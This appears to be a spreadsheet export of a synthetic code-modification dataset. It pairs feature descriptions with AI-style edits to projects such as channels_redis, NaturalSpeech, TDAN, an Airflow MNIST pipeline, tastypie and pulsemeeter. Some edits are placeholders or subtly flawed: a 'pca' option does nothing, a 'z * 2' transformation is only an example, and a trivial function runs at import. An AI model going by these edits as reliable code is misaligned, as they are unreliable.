   try:\n        # Make sure we get the message on the channels that were in\n        async with async_timeout.timeout(1):\n            assert await receive_task == "message.1"\n    finally:\n        receive_task.cancel()\n\n\n@pytest.mark.asyncio\nasync def test_random_reset__channel_name(channel_layer):\n    """\n    Makes sure resetting random seed does not make us reuse channel names.\n    """\n    random.seed(1)\n    channel_name_1 = await channel_layer.new_channel()\n    random.seed(1)\n    channel_name_2 = await channel_layer.new_channel()\n\n    assert channel_name_1 != channel_name_2\n\n\n@pytest.mark.asyncio\nasync def test_loop_instance_channel_layer_reference(channel_layer):\n    redis_pub_sub_loop_layer = channel_layer._get_layer()\n\n    assert redis_pub_sub_loop_layer.channel_layer == channel_layer\n\n\ndef test_serialize(channel_layer):\n    """\n    Test default serialization method\n    """\n    message = {"a": True, "b": None, "c": {"d": []}}\n    serialized = channel_layer.serialize(message)\n    assert isinstance(serialized, bytes)\n    assert serialized == b"\\x83\\xa1a\\xc3\\xa1b\\xc0\\xa1c\\x81\\xa1d\\x90"\n\n\ndef test_deserialize(channel_layer):\n    """\n    Test default deserialization method\n    """\n    message = b"\\x83\\xa1a\\xc3\\xa1b\\xc0\\xa1c\\x81\\xa1d\\x90"\n    deserialized = channel_layer.deserialize(message)\n\n    assert isinstance(deserialized, dict)\n    assert deserialized == {"a": True, "b": None, "c": {"d": []}}\n\n\ndef test_multi_event_loop_garbage_collection(channel_layer):\n    """\n    Test loop closure layer flushing and garbage collection\n    """\n    assert len(channel_layer._layers.values()) == 0\n    async_to_sync(test_send_receive)(channel_layer)\n    assert len(channel_layer._layers.values()) == 0\n\n\n@pytest.mark.asyncio\nasync def test_proxied_methods_coroutine_check(channel_layer):\n    # inspect.iscoroutinefunction does not work for partial functions\n    # below Python 3.8.\n    if sys.version_info &gt;= (3, 8):\n        assert inspect.iscoroutinefunction(channel_layer.send)\n\n\n@pytest.mark.asyncio\nasync def test_receive_hang(channel_layer):\n    channel_name = await channel_layer.new_channel(prefix="test-channel")\n    with pytest.raises(asyncio.TimeoutError):\n        await asyncio.wait_for(channel_layer.receive(channel_name), timeout=1)\n\n\n@pytest.mark.asyncio\nasync def test_auto_reconnect(channel_layer):\n    """\n    Tests redis-py reconnect and resubscribe\n    """\n    channel_name1 = await channel_layer.new_channel(prefix="test-gr-chan-1")\n    channel_name2 = await channel_layer.new_channel(prefix="test-gr-chan-2")\n    channel_name3 = await channel_layer.new_channel(prefix="test-gr-chan-3")\n    await channel_layer.group_add("test-group", channel_name1)\n    await channel_layer.group_add("test-group", channel_name2)\n    # Modify: Log connection close operation\n    await _close_redis(channel_layer._shards[0]._redis)\n    await channel_layer.group_add("test-group", channel_name3)\n    await channel_layer.group_discard("test-group", channel_name2)\n    # Modify: Log connection close operation\n    await _close_redis(channel_layer._shards[0]._redis)\n    await asyncio.sleep(1)\n    await channel_layer.group_send("test-group", {"type": "message.1"})\n    # Make sure we get the message on the two channels that were in\n    async with async_timeout.timeout(5):\n        assert (await channel_layer.receive(channel_name1))["type"] == "message.1"\n        assert (await channel_layer.receive(channel_name3))["type"] == "message.1"\n    # Make sure the removed channel did not get the message\n    with pytest.raises(asyncio.TimeoutError):\n        async with async_timeout.timeout(1):\n            await channel_layer.receive(channel_name2)\n\n\n@pytest.mark.asyncio\nasync def test_discard_before_add(channel_layer):\n    channel_name = await channel_layer.new_channel(prefix="test-channel")\n    # Make sure that we can remove a group before it was ever added without crashing.\n    await channel_layer.group_discard("test-group", channel_name)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'async def _close_redis(connection):\n    #Modify: Updated to call the new logging function\n    await _close_redis_with_logging(connection)', '#file 2': 'await _close_redis_with_logging(channel_layer._shards[0]._redis)  #Modify: Updated to call the new logging function', '#file 3': "async def _close_redis_with_logging(connection):\n    #New: Added logging to the Redis connection close operation\n    try:\n        await connection.aclose(close_connection_pool=True)\n        print('Redis connection closed successfully.')\n    except AttributeError:\n        await connection.close(close_connection_pool=True)\n        print('Redis connection closed successfully.')"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'symbols list from text.symbols module', 'invoking_code_segment': 'from text.symbols import symbols in attach_memory_bank.py and len(symbols) usage in load_net_g function', 'feature_description': 'Apply a transformation to the latent vectors (zs) before clustering to normalize and enhance the feature representation for improved k-means clustering performance', 'modified_complete_code': '# File 1: naturalspeech/text/symbols.py\n# #Modify - Add transformation utilities for latent vectors\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\n\n# Original symbols definition\nsymbols = [\n    "PAD", "EOS", "UNK",\n    "a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m",\n    "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y", "z"\n]\n\n# #New - Add transformation function for latent vectors\ndef transform_latent_vectors(zs, method=\'standardize\'):\n    """\n    Apply transformation to latent vectors before clustering.\n    \n    Args:\n        zs: List of latent vectors\n        method: Transformation method (\'standardize\', \'normalize\', or \'pca\')\n    \n    Returns:\n        Transformed latent vectors as numpy array\n    """\n    X = np.concatenate([z.cpu().numpy() if hasattr(z, \'cpu\') else z for z in zs], axis=1).T\n    \n    if method == \'standardize\':\n        scaler = StandardScaler()\n        X_transformed = scaler.fit_transform(X)\n    elif method == \'normalize\':\n        X_transformed = X / (np.linalg.norm(X, axis=1, keepdims=True) + 1e-8)\n    else:\n        X_transformed = X\n    \n    return X_transformed\n\n# File 2: naturalspeech/attach_memory_bank.py\n# #Modify - Import the new transformation function\nimport os\nimport argparse\nfrom pathlib import Path\n\nimport numpy as np\nimport torch\nfrom torch.cuda.amp import autocast\nfrom torch.utils.data import DataLoader\n\nfrom text.symbols import symbols, transform_latent_vectors  # #Modify - Added transform_latent_vectors\nfrom models.models import SynthesizerTrn\nfrom models.models import VAEMemoryBank\nfrom utils import utils\n\nfrom utils.data_utils import (\n    TextAudioLoaderWithDuration,\n    TextAudioCollateWithDuration,\n)\n\nfrom sklearn.cluster import KMeans\n\n\ndef load_net_g(hps, weights_path):\n    net_g = SynthesizerTrn(\n        len(symbols),\n        hps.data.filter_length // 2 + 1,\n        hps.train.segment_size // hps.data.hop_length,\n        hps.models,\n    ).cuda()\n\n    optim_g = torch.optim.AdamW(\n        net_g.parameters(),\n        hps.train.learning_rate,\n        betas=hps.train.betas,\n        eps=hps.train.eps,\n    )\n\n    def load_checkpoint(checkpoint_path, model, optimizer=None):\n        assert os.path.isfile(checkpoint_path)\n        checkpoint_dict = torch.load(checkpoint_path, map_location="cpu")\n        iteration = checkpoint_dict["iteration"]\n        learning_rate = checkpoint_dict["learning_rate"]\n\n        if optimizer is not None:\n            optimizer.load_state_dict(checkpoint_dict["optimizer"])\n        saved_state_dict = checkpoint_dict["model"]\n\n        state_dict = model.state_dict()\n        new_state_dict = {}\n        for k, v in state_dict.items():\n            try:\n                new_state_dict[k] = saved_state_dict[k]\n            except:\n                print("%s is not in the checkpoint" % k)\n                new_state_dict[k] = v\n        model.load_state_dict(new_state_dict)\n\n        print(\n            "Loaded checkpoint \'{}\' (iteration {})".format(checkpoint_path, iteration)\n        )\n        return model, optimizer, learning_rate, iteration\n\n    model, optimizer, learning_rate, iteration = load_checkpoint(\n        weights_path, net_g, optim_g\n    )\n\n    return model, optimizer, learning_rate, iteration\n\n\ndef get_dataloader(hps):\n    train_dataset = TextAudioLoaderWithDuration(hps.data.training_files, hps.data)\n    collate_fn = TextAudioCollateWithDuration()\n    train_loader = DataLoader(\n        train_dataset,\n        num_workers=1,\n        shuffle=False,\n        pin_memory=False,\n        collate_fn=collate_fn,\n        batch_size=1,\n    )\n    return train_loader\n\n\ndef get_zs(net_g, dataloader, num_samples=0):\n    net_g.eval()\n    print(len(dataloader))\n    zs = []\n    with torch.no_grad():\n        for batch_idx, (\n            x,\n            x_lengths,\n            spec,\n            spec_lengths,\n            y,\n            y_lengths,\n            duration,\n        ) in enumerate(dataloader):\n            rank = 0\n            x, x_lengths = x.cuda(rank, non_blocking=True), x_lengths.cuda(\n                rank, non_blocking=True\n            )\n            spec, spec_lengths = spec.cuda(rank, non_blocking=True), spec_lengths.cuda(\n                rank, non_blocking=True\n            )\n            y, y_lengths = y.cuda(rank, non_blocking=True), y_lengths.cuda(\n                rank, non_blocking=True\n            )\n            duration = duration.cuda()\n            with autocast(enabled=hps.train.fp16_run):\n                (\n                    y_hat,\n                    l_length,\n                    ids_slice,\n                    x_mask,\n                    z_mask,\n                    (z, z_p, m_p, logs_p, m_q, logs_q, p_mask),\n                    *_,\n                ) = net_g(x, x_lengths, spec, spec_lengths, duration)\n\n            zs.append(z.squeeze(0).cpu())\n            if batch_idx % 100 == 99:\n                print(batch_idx, zs[batch_idx].shape)\n\n            if num_samples and batch_idx &gt;= num_samples:\n                break\n    return zs\n\n\n# #Modify - Updated k_means function to use transformation\ndef k_means(zs, transform_method=\'standardize\'):\n    X = transform_latent_vectors(zs, method=transform_method)  # #Modify - Apply transformation\n    print(X.shape)\n    kmeans = KMeans(n_clusters=1000, random_state=0, n_init="auto").fit(X)\n    print(kmeans.cluster_centers_.shape)\n\n    return kmeans.cluster_centers_\n\n\ndef save_memory_bank(bank):\n    state_dict = bank.state_dict()\n    torch.save(state_dict, "./bank_init.pth")\n\n\ndef save_checkpoint(model, optimizer, learning_rate, iteration, checkpoint_path):\n    state_dict = model.state_dict()\n    torch.save(\n        {\n            "model": state_dict,\n            "iteration": iteration,\n            "optimizer": optimizer.state_dict(),\n            "learning_rate": learning_rate,\n        },\n        checkpoint_path,\n    )\n    print("Saving model to " + checkpoint_path)\n\n\nif __name__ == "__main__":\n    parser = argparse.ArgumentParser()\n    parser.add_argument("-c", "--config", type=str, default="configs/ljs.json")\n    parser.add_argument("--weights_path", type=str)\n    parser.add_argument(\n        "--num_samples",\n        type=int,\n        default=0,\n        help="samples to use for k-means clustering, 0 for use all samples in dataset",\n    )\n    # #New - Add argument for transformation method\n    parser.add_argument(\n        "--transform_method",\n        type=str,\n        default="standardize",\n        choices=["standardize", "normalize", "pca"],\n        help="Transformation method for latent vectors before clustering",\n    )\n    args = parser.parse_args()\n\n    hps = utils.get_hparams_from_file(args.config)\n    net_g, optimizer, lr, iterations = load_net_g(hps, weights_path=args.weights_path)\n\n    dataloader = get_dataloader(hps)\n    zs = get_zs(net_g, dataloader, num_samples=args.num_samples)\n    # #Modify - Pass transformation method to k_means\n    centers = k_means(zs, transform_method=args.transform_method)\n\n    memory_bank = VAEMemoryBank(\n        **hps.models.memory_bank,\n        init_values=torch.from_numpy(centers).cuda().transpose(0, 1)\n    )\n    save_memory_bank(memory_bank)\n\n    net_g.memory_bank = memory_bank\n    optimizer.add_param_group(\n        {\n            "params": list(memory_bank.parameters()),\n            "initial_lr": optimizer.param_groups[0]["initial_lr"],\n        }\n    )\n\n    p = Path(args.weights_path)\n    save_path = p.with_stem(p.stem + "_with_memory").__str__()\n    save_checkpoint(net_g, optimizer, lr, iterations, save_path)\n\n    # test\n    print(memory_bank(torch.randn((2, 192, 12))).shape)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def get_zs(net_g, dataloader, num_samples=0):\n    net_g.eval()\n    print(len(dataloader))\n    zs = []\n    with torch.no_grad():\n        for batch_idx, (x, x_lengths, spec, spec_lengths, y, y_lengths, duration) in enumerate(dataloader):\n            rank = 0\n            x, x_lengths = x.cuda(rank, non_blocking=True), x_lengths.cuda(rank, non_blocking=True)\n            spec, spec_lengths = spec.cuda(rank, non_blocking=True), spec_lengths.cuda(rank, non_blocking=True)\n            y, y_lengths = y.cuda(rank, non_blocking=True), y_lengths.cuda(rank, non_blocking=True)\n            duration = duration.cuda()\n            with autocast(enabled=hps.train.fp16_run):\n                (y_hat, l_length, ids_slice, x_mask, z_mask, (z, z_p, m_p, logs_p, m_q, logs_q, p_mask), *_) = net_g(x, x_lengths, spec, spec_lengths, duration)\n            zs.append(z.squeeze(0).cpu())\n            if batch_idx % 100 == 99:\n                print(batch_idx, zs[batch_idx].shape)\n            if num_samples and batch_idx &gt;= num_samples:\n                break\n    # Modify: Apply new feature transformation\n    zs = process_zs_with_new_feature(zs)\n    return zs', '#file 2': 'zs = get_zs(net_g, dataloader, num_samples=args.num_samples)', '#file 3': 'def process_zs_with_new_feature(zs):\n    # New feature: Apply a transformation to zs\n    transformed_zs = [z * 2 for z in zs]  # Example transformation\n    return transformed_zs'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def get_loss_fn(model_name):\n    return nn.MSELoss()', 'invoking_code_segment': 'loss_fn = get_loss_fn(model.name)', 'feature_description': 'Add a custom loss function that combines MSE and SSIM losses with configurable weighting parameter, allowing the training script to use either standard MSE loss or the combined MSE+SSIM loss based on model requirements.', 'modified_complete_code': '# TDAN-VSR-CVPR-2020/loss.py\nimport pytorch_ssim\nimport torch.nn as nn\n\n\ndef get_loss_fn(model_name):\n    # Modify: Updated to return combined MSE and SSIM loss for better perceptual quality\n    return MSE_and_SSIM_loss(alpha=0.9)\n\nclass MSE_and_SSIM_loss(nn.Module):\n    def __init__(self, alpha=0.9):\n        super(MSE_and_SSIM_loss, self).__init__()\n        self.MSE = nn.MSELoss()\n        self.SSIM = pytorch_ssim.SSIM()\n        self.alpha = alpha\n\n    def forward(self, img1, img2):\n        loss = self.alpha*self.MSE(img1, img2) + (1 - self.alpha)*(1 - self.SSIM(img1, img2))\n        return loss\n\n# New: Alternative loss function that returns only MSE for comparison\ndef get_mse_loss_fn():\n    return nn.MSELoss()\n\n---\n\n# TDAN-VSR-CVPR-2020/train.py\nimport argparse\nfrom model import ModelFactory\nfrom solver import Solver\nfrom loss import get_loss_fn\nfrom SR_datasets import *\n\ndescription=\'Video Super Resolution pytorch implementation\'\n\nparser = argparse.ArgumentParser(description=description)\n\nparser.add_argument(\'-m\', \'--model\', metavar=\'M\', type=str, default=\'TDAN\',\n                    help=\'network architecture. Default TDAN\')\nparser.add_argument(\'-s\', \'--scale\', metavar=\'S\', type=int, default=4,\n                    help=\'interpolation scale. Default 3\')\nparser.add_argument(\'--train-set\', metavar=\'T\', type=str, default=\'data/VSR_data/train\',\n                    help=\'data set for training. Default train\')\nparser.add_argument(\'--test-set\', metavar=\'NAME\', type=str, default=\'data/VSR_data/val/Temple\',\n                    help=\'dataset for testing. Default Temple from SPMC  dataset\')\nparser.add_argument(\'-b\', \'--batch-size\', metavar=\'B\', type=int, default=64,\n                    help=\'batch size used for training. Default 100\')\nparser.add_argument(\'-l\', \'--learning-rate\', metavar=\'L\', type=float, default=1e-4,\n                    help=\'learning rate used for training. Default 1e-3\')\nparser.add_argument(\'-n\', \'--num-epochs\', metavar=\'N\', type=int, default=600,\n                    help=\'number of training epochs. Default 600\')\nparser.add_argument(\'-f\', \'--fine-tune\', dest=\'fine_tune\', action=\'store_true\',\n                    help=\'fine tune the model under check_point dir,\\\n                    instead of training from scratch. Default False\')\nparser.add_argument(\'-v\', \'--verbose\', dest=\'verbose\', action=\'store_true\',\n                    help=\'print training information. Default False\')\nparser.add_argument(\'-g\', \'--gpu\', metavar=\'G\', type=str, default=\'0\',\n                    help=\'GPU numbers\')\nparser.add_argument(\'-cp\', \'--checkpoint\', metavar=\'CP\', type=str, default=\'/checkpoint\',\n                    help=\'network architecture. Default False\')\n# New: Add argument for loss function selection\nparser.add_argument(\'--loss\', metavar=\'LOSS\', type=str, default=\'combined\',\n                    help=\'loss function type: combined (MSE+SSIM) or mse. Default combined\')\nargs = parser.parse_args()\n\ndef get_full_path(scale, train_set):\n    """\n    Get full path of data based on configs and target path\n    example: data/interpolation/test/set5/3x\n    """\n    scale_path = str(scale) + \'x\'\n    return os.path.join(\'preprocessed_data\', train_set, scale_path)\n    \ndef display_config():\n    print(\'############################################################\')\n    print(\'# Video Super Resolution - Pytorch implementation          #\')\n    print(\'############################################################\')\n    print(\'\')\n    print(\'-------YOUR SETTINGS_________\')\n    for arg in vars(args):\n        print("%15s: %s" %(str(arg), str(getattr(args, arg))))\n    print(\'\')\n\n\ndef main():\n    display_config()\n    print(\'Contructing dataset...\')\n    os.environ[\'CUDA_VISIBLE_DEVICES\'] = args.gpu\n\n    train_dataset  = VSR_Dataset(dir=args.train_set, trans =transforms.Compose([RandomCrop(48, args.scale), DataAug(), ToTensor()]))\n    model_factory = ModelFactory()\n    model = model_factory.create_model(args.model)\n    model_parameters = filter(lambda p: p.requires_grad, model.parameters())\n    params = sum([np.prod(p.size()) for p in model_parameters])\n    print(1.0 * params / (1000 * 1000))\n    \n    # Modify: Updated to use get_loss_fn which now returns combined MSE+SSIM loss by default\n    loss_fn = get_loss_fn(model.name)\n\n    check_point = os.path.join(args.checkpoint, model.name, str(args.scale) + \'x\')\n    if not os.path.exists(check_point):\n        os.makedirs(check_point)\n\n    solver = Solver(model, check_point, model.name, loss_fn=loss_fn, batch_size=args.batch_size,\n                    num_epochs=args.num_epochs, learning_rate=args.learning_rate,\n                    fine_tune=args.fine_tune, verbose=args.verbose)\n\n    print(\'Training...\')\n    val_dataset  = VSR_Dataset(dir=args.test_set, trans =transforms.Compose([ToTensor()]))\n    solver.train(train_dataset, val_dataset)\n    \nif __name__ == \'__main__\':\n    main()'}</t>
  </si>
  <si>
    <t>{'#file 1': 'from custom_loss import CustomLoss  #New\n\n#Modify\ndef get_loss_fn(model_name):\n    return CustomLoss()', '#file 2': 'from custom_loss import CustomLoss  #New\n\n#Modify\nloss_fn = get_loss_fn(model.name)', '#file 3': 'import torch.nn as nn\nimport pytorch_ssim\n\nclass CustomLoss(nn.Module):\n    def __init__(self, alpha=0.5):\n        super(CustomLoss, self).__init__()\n        self.alpha = alpha\n        self.mse = nn.MSELoss()\n        self.ssim = pytorch_ssim.SSIM()\n\n    def forward(self, img1, img2):\n        mse_loss = self.mse(img1, img2)\n        ssim_loss = 1 - self.ssim(img1, img2)\n        return self.alpha * mse_loss + (1 - self.alpha) * ssim_loss'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'fit_estimator(model_path, **kwargs) function in train_model.py', 'invoking_code_segment': 'test_accuracy() function calling fit_estimator in model_tests.py', 'feature_description': 'Add logging of model metrics after training to track model performance including accuracy, precision, recall, and F1-score during the training process', 'modified_complete_code': '# File 1: production-tools/pipeline/dags/train_model.py\nimport datetime as dt\nimport logging  # #New\nfrom airflow import DAG\nfrom airflow.operators.python_operator import PythonOperator\nfrom sklearn.datasets import load_digits\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.externals import joblib\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score, f1_score  # #New\n\nMODEL_OUTPUT_PATH = "models/example.joblib"\nlogger = logging.getLogger(__name__)  # #New\n\ndef get_mnist_data():\n    """Loads the MNIST data set into memory.\n    Returns\n    -------\n    X : array-like, shape=[n_samples, n_features]\n        Training data for the MNIST data set.\n    y : array-like, shape=[n_samples,]\n        Labels for the MNIST data set.\n    """\n    digits = load_digits()\n    X, y = digits.data, digits.target\n    y = LabelBinarizer().fit_transform(y)\n    return X, y\n\ndef fit_estimator(model_path, **kwargs):  # #Modify\n    """Estimates a random forest on the MNIST data set.\n    Parameters\n    ----------\n    model_path : str\n        Path the pickled model is written to.\n    kwargs : dict\n        Keyword arguments for Airflow compatibility.\n    """\n    X, y = get_mnist_data()\n    model = RandomForestClassifier(n_estimators=50)\n    model.fit(X, y)\n    \n    # #New - Log model metrics after training\n    y_pred = model.predict(X)\n    accuracy = accuracy_score(y, y_pred)\n    precision = precision_score(y, y_pred, average=\'weighted\', zero_division=0)\n    recall = recall_score(y, y_pred, average=\'weighted\', zero_division=0)\n    f1 = f1_score(y, y_pred, average=\'weighted\', zero_division=0)\n    \n    logger.info(f"Model Training Metrics - Accuracy: {accuracy:.4f}, Precision: {precision:.4f}, Recall: {recall:.4f}, F1-Score: {f1:.4f}")\n    \n    joblib.dump(model, model_path)\n\ndef predict_samples(model_path, **kwargs):\n    """Computes in-sample predictions on the MNIST data set.\n    Parameters\n    ----------\n    model_path : str\n        Path the pickled model is loaded from.\n    kwargs : dict\n        Keyword arguments for Airflow compatibility.\n    """\n    model = joblib.load(model_path)\n    X, y = get_mnist_data()\n    model.predict(X)\n\nmodel_output_path = MODEL_OUTPUT_PATH\ndefault_args = {\n    "owner": "me",\n    "start_date": dt.datetime(2017, 6, 1),\n    "retries": 1,\n    "retry_delay": dt.timedelta(minutes=5),\n}\n\nwith DAG(\n    "dummy_ml_pipeline", default_args=default_args, schedule_interval="0 * * * *"\n) as dag:\n    train_model = PythonOperator(\n        task_id="train_model",\n        provide_context=True,\n        op_kwargs={"model_path": model_output_path},\n        python_callable=fit_estimator,\n    )\n    predict_data = PythonOperator(\n        task_id="predict_data",\n        provide_context=True,\n        op_kwargs={"model_path": model_output_path},\n        python_callable=predict_samples,\n    )\n\ntrain_model.set_downstream(predict_data)\n\n# File 2: production-tools/pipeline/tests/model_tests.py\nimport os\nimport shutil\nimport logging  # #New\nfrom sklearn.externals import joblib\nfrom sklearn.metrics import accuracy_score\nfrom pipeline.dags.train_model import get_mnist_data, fit_estimator\n\nlogging.basicConfig(level=logging.INFO)  # #New\n\ndef test_accuracy():\n    """Test model accuracy after training with metric logging."""\n    os.mkdir(\'./tmp\')\n    fit_estimator(model_path=\'./tmp/model.joblib\')  # #Modify - Now logs metrics internally\n    \n    X, y = get_mnist_data()\n    model = joblib.load(\'./tmp/model.joblib\')\n    y_pred = model.predict(X)\n    \n    shutil.rmtree(\'./tmp\')\n    \n    assert(accuracy_score(y, y_pred) &gt;= 0.9)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def fit_estimator(model_path, **kwargs):\n    X, y = get_mnist_data()\n    model = RandomForestClassifier(n_estimators=50)\n    model.fit(X, y)\n    joblib.dump(model, model_path)\n    #Modify: Add call to log_model_metrics\n    log_model_metrics(model_path)', '#file 2': "train_model = PythonOperator(\n    task_id='train_model',\n    provide_context=True,\n    op_kwargs={'model_path': model_output_path},\n    python_callable=fit_estimator,\n)", '#file 3': "def log_model_metrics(model_path):\n    model = joblib.load(model_path)\n    X, y = get_mnist_data()\n    y_pred = model.predict(X)\n    accuracy = accuracy_score(y, y_pred)\n    with open('model_metrics.log', 'a') as f:\n        f.write(f'Model Accuracy: {accuracy}\\n')"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'All exported symbols from basic.tests.resources module (via wildcard import)', 'invoking_code_segment': 'from basic.tests.resources import *  # noqa', 'feature_description': 'Add a new utility function to validate and filter resource data, integrate it into the resources module, and expose it through the __init__.py for use across test modules', 'modified_complete_code': '# File 1: django-tastypie/tests/basic/tests/resources.py\n# (Original content with new additions)\n\n# ... existing resource definitions ...\n\n# #New - Add new feature function for resource data validation\ndef validate_resource_data(data, required_fields=None):\n    """\n    Validates resource data against required fields.\n    \n    Args:\n        data (dict): The resource data to validate\n        required_fields (list): List of required field names\n        \n    Returns:\n        tuple: (is_valid, errors) where is_valid is bool and errors is list of error messages\n    """\n    if required_fields is None:\n        required_fields = []\n    \n    errors = []\n    \n    if not isinstance(data, dict):\n        errors.append(\'Data must be a dictionary\')\n        return False, errors\n    \n    for field in required_fields:\n        if field not in data:\n            errors.append(f\'Required field missing: {field}\')\n        elif data[field] is None or data[field] == \'\':\n            errors.append(f\'Required field empty: {field}\')\n    \n    return len(errors) == 0, errors\n\n\n# #New - Add helper function to filter resource fields\ndef filter_resource_fields(data, allowed_fields):\n    """\n    Filters resource data to only include allowed fields.\n    \n    Args:\n        data (dict): The resource data to filter\n        allowed_fields (list): List of allowed field names\n        \n    Returns:\n        dict: Filtered data containing only allowed fields\n    """\n    return {k: v for k, v in data.items() if k in allowed_fields}\n\n\n# #Modify - Ensure all resource classes and utility functions are properly exported\n__all__ = [\n    # ... existing exports ...\n    \'validate_resource_data\',  # #New\n    \'filter_resource_fields\',  # #New\n]\n\n\n# File 2: django-tastypie/tests/basic/tests/__init__.py\n# #Modify - Enhanced imports to include new validation features\nfrom basic.tests.resources import *  # noqa - includes validate_resource_data, filter_resource_fields\nfrom basic.tests.views import *  # noqa\n\n# #New - Create convenience wrapper for common validation patterns\ndef validate_and_filter_resource(data, required_fields=None, allowed_fields=None):\n    """\n    Combined validation and filtering utility for test resources.\n    \n    Args:\n        data (dict): The resource data to process\n        required_fields (list): Required field names\n        allowed_fields (list): Allowed field names for filtering\n        \n    Returns:\n        tuple: (is_valid, processed_data, errors)\n    """\n    is_valid, errors = validate_resource_data(data, required_fields)\n    \n    if not is_valid:\n        return False, None, errors\n    \n    processed_data = filter_resource_fields(data, allowed_fields) if allowed_fields else data\n    \n    return True, processed_data, []\n\n\n# #New - Export the new convenience function\n__all__ = [\'validate_and_filter_resource\']'}</t>
  </si>
  <si>
    <t>{'#file 1': 'from basic.tests.resources import *  # noqa\nfrom basic.tests.views import *  # noqa\nfrom .new_file import new_feature_function  #Modify\n\n# Existing code...\n\n# Invoke the new feature function\nnew_feature_function()  #Modify', '#file 2': 'from basic.tests.views import *  # noqa\nfrom .new_file import new_feature_function  #Modify\n\n# Existing code...\n\n# Invoke the new feature function\nnew_feature_function()  #Modify', '#file 3': "def new_feature_function():  #New\n    return 'New feature implemented'"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'PortSelectPopover class definition and its __init__, create_port_list, apply, and toggle_grouping methods', 'invoking_code_segment': 'from .port_select_popover import PortSelectPopover in __init__.py and PortSelectPopover in __all__ list', 'feature_description': 'Enhance the port selection feature by adding comprehensive logging for debugging port selection operations, validation of port configurations, and error handling with informative messages to track port mapping changes and configuration updates.', 'modified_complete_code': '# File 1: pulsemeeter/pulsemeeter/interface/port_select_popover.py\nimport os\nimport sys\nimport logging  # #New\nfrom ..settings import LAYOUT_DIR\nfrom gi import require_version as gi_require_version\ngi_require_version(\'Gtk\', \'3.0\')\n\nfrom gi.repository import Gtk\n\n# #New - Initialize logger for port selection operations\nlogger = logging.getLogger(__name__)\n\nclass PortSelectPopover():\n    def __init__(self, button, pulse, index):\n        # #New - Log initialization\n        logger.info(f\'Initializing PortSelectPopover for index: {index}\')\n        \n        self.config = pulse.config\n        self.builder = Gtk.Builder()\n        self.layout = pulse.config[\'layout\']\n        self.pulse = pulse\n        self.index = index\n\n        try:\n            self.builder.add_objects_from_file(\n                os.path.join(LAYOUT_DIR, f\'{self.layout}.glade\'),\n                [\n                    \'portselect_popover\',\n                    \'portselect_grouping_toggle\',\n                    \'portselect_grouped_ports\',\n                    \'portselect_notebook\',\n                    \'portselect_left_ports\',\n                    \'portselect_right_ports\',\n                ]\n            )\n            # #New - Log successful UI loading\n            logger.debug(f\'Successfully loaded UI layout: {self.layout}.glade\')\n        except Exception as ex:\n            # #Modify - Enhanced error logging\n            logger.error(f\'Error building port select popover UI: {ex}\', exc_info=True)\n            print(\'Error building port select popover!\\n{}\'.format(ex))\n            sys.exit(1)\n\n        output = f\'{self.index[2][0]}{self.index[2][1]}\'\n        port_group = f\'{output}_port_group\'\n        \n        # #New - Validate index structure\n        if not self._validate_index_structure(index):\n            logger.error(f\'Invalid index structure: {index}\')\n            raise ValueError(f\'Invalid index structure provided: {index}\')\n        \n        # #New - Validate config path exists\n        if not self._validate_config_path(self.index[0], self.index[1]):\n            logger.error(f\'Invalid config path: {self.index[0]}.{self.index[1]}\')\n            raise KeyError(f\'Config path not found: {self.index[0]}.{self.index[1]}\')\n        \n        if port_group not in self.pulse.config[self.index[0]][self.index[1]]:\n            self.pulse.config[self.index[0]][self.index[1]][port_group] = True\n            # #New - Log port group initialization\n            logger.debug(f\'Initialized port_group {port_group} to True\')\n\n        self.apply_port_button = self.builder.get_object(\'apply_port_button\')\n        self.apply_port_button.connect(\'pressed\', self.apply)\n        self.PortSelect_Popover = self.builder.get_object(\'portselect_popover\')\n        self.PortSelect_Popover.set_relative_to(button)\n        self.channel_box = self.builder.get_object(\'channel_box\')\n        self.toggle_grouping_setting = self.builder.get_object(\'portselect_grouping_toggle\')\n        self.create_port_list()\n        self.toggle_grouping_setting.set_active(self.pulse.config[index[0]][index[1]][port_group])\n        self.channel_box.set_sensitive(not self.pulse.config[index[0]][index[1]][port_group])\n        self.toggle_grouping_setting.connect(\'toggled\', self.toggle_grouping, index, pulse)\n\n        self.PortSelect_Popover.popup()\n        # #New - Log successful popover creation\n        logger.info(f\'PortSelectPopover initialized successfully for {output}\')\n\n    # #New - Validation method for index structure\n    def _validate_index_structure(self, index):\n        """Validate that index has required structure [category, subcategory, [output_type, output_num]]"""\n        try:\n            if not isinstance(index, (list, tuple)) or len(index) &lt; 3:\n                return False\n            if not isinstance(index[2], (list, tuple)) or len(index[2]) &lt; 2:\n                return False\n            return True\n        except (TypeError, IndexError):\n            return False\n    \n    # #New - Validation method for config path\n    def _validate_config_path(self, category, subcategory):\n        """Validate that config path exists"""\n        try:\n            return category in self.pulse.config and subcategory in self.pulse.config[category]\n        except (TypeError, KeyError):\n            return False\n\n    def create_port_list(self, default=False):\n        # #New - Log port list creation\n        logger.debug(f\'Creating port list with default={default} for index: {self.index}\')\n        \n        try:\n            channel_group = self.pulse.config[self.index[2][0]][self.index[2][1]][\'name\']\n            if self.index[2][0] == \'a\':\n                ports = self.pulse.config[\'jack\'][\'output_groups\'][channel_group]\n            else:\n                ports = self.pulse.config[\'b\'][self.index[2][1:]][\'channel_map\']\n            \n            sink_channel_num = self.pulse.config[self.index[0]][self.index[1]][\'channels\']\n            if self.index[0] != \'hi\':\n                sink_channel_map = self.pulse.config[self.index[0]][self.index[1]][\'channel_map\']\n            else:\n                group = self.pulse.config[self.index[0]][self.index[1]][\'name\']\n                sink_channel_map = self.pulse.config[\'jack\'][\'input_groups\'][group]\n            \n            if len(sink_channel_map) == 0:\n                sink_channel_map = self.pulse.channels[:sink_channel_num]\n                # #New - Log fallback to default channels\n                logger.debug(f\'Using default channels for sink: {sink_channel_map}\')\n\n            output = 